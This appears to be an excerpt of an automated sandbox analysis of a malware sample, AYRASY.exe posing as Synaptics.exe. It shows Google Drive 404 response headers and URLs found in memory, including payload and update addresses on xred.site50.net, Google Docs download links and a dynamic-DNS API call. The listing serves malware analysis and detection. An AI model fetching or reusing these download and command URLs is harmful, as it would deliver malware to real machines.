                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC6dn2YiMuFrEVz30xh86cgW93-3PVpCeJYuVa-n7kyBql0GKo1hFdSgyDauFKoAoV1TqsuSZjI | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:24:25 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Content-Security-Policy: script-src 'report-sample' 'nonce-RyFGItg9gk3Hmp-F8ePMjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Set-Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls; expires=Tue, 01-Jul-2025 10:24:25 GMT; path=/; domain=.google.com; HttpOnly | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC5OUs6SLq_gifeKaWfdpW8szT43R6AulKqLDrTgdYvBbpR3pbfDkd0ReVRyEkQDO-S3nK3tmcY | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:24:25 GMT | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Content-Security-Policy: script-src 'report-sample' 'nonce-Npx_MsSYLtwC38RCVckNlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC5PadOovM7s9q5Wk1FfDLTsnskZrz30GV1YL-mQ5BpWt77CpHEb_GtuOiyxHGGXeWRZM0rBR2Y | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:24:26 GMT | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Content-Security-Policy: script-src 'report-sample' 'nonce-blAmeqrZ0EEv6NGq11xvow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC46BymJCRqKBorebc2NonONRqLKZVtdOnh7C0s5guQ8geNTZrtyaCD-QHzcNnidF8YO | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:24:27 GMT | Content-Security-Policy: script-src 'report-sample' 'nonce-9v7le9JNVb7QErAUUIhmVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Eq4TD4ILL790l7uH5J7z2wbhr4Zmgs6GN2XBwQlw4ULxXgrDMJE5CbSQxx2bJnMtYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:28 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-hU4WgPMxJNCXNXDc4w6K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62pXpF9gPxS4A8wBQVnREIVhhZgjAjf-LpjAHz2m6qfDN1JYdmwcJAmCFIEIo2nkK4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pJ21Rb7YEukVyuqOnJ_5cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5H8Rf2gxopgfU0LNy-PTnvK8i1CW1NpBbzXJGXOXOtCKkUv8iXakdI_QrBpvRvClQZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fntrifWRNxc3w0N0Tpos8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kehbyELL0W91XsWCbMg9moQ5Wzh-IbfwZp6bVz_HIu12WHEwQX_rE4NWCjY54xl4KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kbX6avv9aSR2lRkvvhaC_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: AYRASY.exeString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978;X
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978l
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3416162659.00000000046DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                                Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl8
                                Source: AYRASY.exeString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: AYRASY.exeString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0.
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: AYRASY.exeString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/der
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/neer
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/oogle-analytics.com
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ty
                                Source: Synaptics.exe, 00000003.00000002.2455890398.00000000083BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2444140781.000000000617E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMX
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: AYRASY.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: AYRASY.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$J
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&H
                                Source: Synaptics.exe, 00000003.00000002.2441515499.00000000055D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Form
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-arch
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download024
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download13
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6K
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6O
                                Source: Synaptics.exe, 00000003.00000003.2356535180.0000000005615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8Q
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005592000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;O
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;max-
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=2592
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000003.00000002.2441515499.00000000055D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD3
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFKNv
